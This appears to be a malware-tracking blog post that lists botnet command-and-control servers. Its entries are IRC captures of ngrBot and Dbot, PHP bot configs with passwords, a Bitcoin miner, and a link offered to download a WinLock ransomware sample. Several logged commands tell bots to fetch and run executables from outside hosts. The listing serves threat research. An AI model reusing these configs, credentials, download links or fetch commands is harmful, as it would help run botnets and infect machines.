From Russia with love another terrible malware More info about this shit here: http://www.google.fr/search?hl=fr&q=Trojan+Ransom+%28WinLock%29++&meta= This version is coded in delphi Download: http://adf.ly/2NFYe
72.20.30.70(ngrBot hosted in United States Staminus Communications)
Remote Host Port Number 199.15.234.7 80 59.120.20.43 80 72.20.30.70 7475 PASS ngrBot NICK n{US|XPa}obsduin USER obsduin 0 0 :obsduin JOIN ##cybercenter## ngrBot JOIN #US PRIVMSG ##cybercenter## :[DNS]: Blocked 0 domain(s) – Redirected 24 domain(s) hosting infos: http://whois.domaintools.com/72.20.30.70
x.miners.in(Silent Bitcoin Miner)
Resolved : [x.miners.in] To [66.228.53.52] Resolved : [x.miners.in] To [66.228.53.5] Resolved : [x.miners.in] To [66.228.53.56] Resolved : [x.miners.in] To [66.228.53.55] Resolved : [x.miners.in] To [173.255.204.19] Resolved : [x.miners.in] To [96.126.112.223] Resolved : [x.miners.in] To [96.126.112.23] Resolved : [x.miners.in] To [173.255.202.228] ping -n 15 127.0.0.1 taskkill /f /im cgminer.exe taskkill /f /im svchoost.exe taskkill /f /imRead more...
Sabukenke.com(ngrBot hosted in Germany Rapidswitch Ltd)
Resolved : [Sabukenke.com] To [78.129.229.120] Remote Host Port Number 199.115.229.186 80 199.15.234.7 80 78.129.229.120 7777 PASS laekin0505x NICK n{US|XPa}zcmlqxw USER zcmlqxw 0 0 :zcmlqxw JOIN #totalrenovation2011 ngrBot PRIVMSG #totalrenovation2011 :[d=”http://199.115.229.186/~cirrus13/1100New.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataMcxaxm.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/78.129.229.120
slics2.geeksX.us [Crew](ngrBot hosted in France Paris Gandi)
Remote Host Port Number 199.15.234.7 80 92.243.5.149 33333 PASS ngrBot chanels: #3new# hosting infos: http://whois.domaintools.com/92.243.5.149
64.31.60.72(600 linux bots hosted in United States Limestone Networks Inc)
var $config = array(“server”=>”64.31.60.72”, “port”=>”4085”, “pass”=>””, “prefix”=>”BOTNET”, “maxrand”=>”3”, “chan”=>”#cp”, “chan2″=>”#cp”, “key”=>”123456”, “modes”=>”+p”, “password”=>”123”, “trigger”=>”.”, “hostauth”=>”*” Local users: Current Local Users: 272 Max: 1018 Global users: Current Global Users: 272 Max: 633 hosting infos: http://whois.domaintools.com/64.31.60.72
Branthu.no-ip.biz(linux bots hosted in Canada Toronto Wyzdom Technologies Inc)
var $config = array(“server”=>”Branthu.no-ip.biz”, “port”=>7000, “pass”=>””, //senha do server “prefix”=>”xpl0”, “maxrand”=>8, “chan”=>”#x”, “key”=>”123”, //senha do canal “modes”=>”+p”, “password”=>”qwerty”, //senha do bot “trigger”=>”.”, “hostauth”=>”*” Resolved : [Branthu.no-ip.biz] To [64.34.138.125] hosting infos: http://whois.domaintools.com/64.34.138.125
74.82.57.207(ngrBot hosted in United States San Jose Neosurge)
Remote Host Port Number 199.101.133.137 80 199.15.234.7 80 74.82.57.207 1888 PASS ngrBot NICK n{US|XPa}msujxop USER msujxop 0 0 :msujxop JOIN ##center 1963.g3rb3rs1t0.3691 JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://dc380.4shared.com/download/qjRbLPFo/gtdtduf.exe” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/74.82.57.207
65.12.196.205(Dbot hosted in United States Ft. Lauderdale Bellsouth.net Inc)
Remote Host Port Number 65.12.196.205 8004 JOIN ##click## click PRIVMSG ##click## :Scanning: 99.x.x.x, 99 threads. Using CFTP. PONG us.undernet.org.org Now talking in ##click## Topic On: [ ##click## ] [ .scan 99 1 y 2 2 99.x.x.x ] Topic By: [ Ccc ] Modes On: [ ##click## ] [ +smntMuk click ] hosting infos: http://whois.domaintools.com/65.12.196.205
219.238.253.143(irc bot hosted in China Beijing Beijing Guang Bo Xue Yuan Co.ltd)
Remote Host Port Number 219.238.253.143 4244 NICK new[iRooT-XP-USA]288239 USER 2882 “” “TsGh” :2882 JOIN #!G!# as PONG :irc.akanska.org hosting infos: http://whois.domaintools.com/219.238.253.143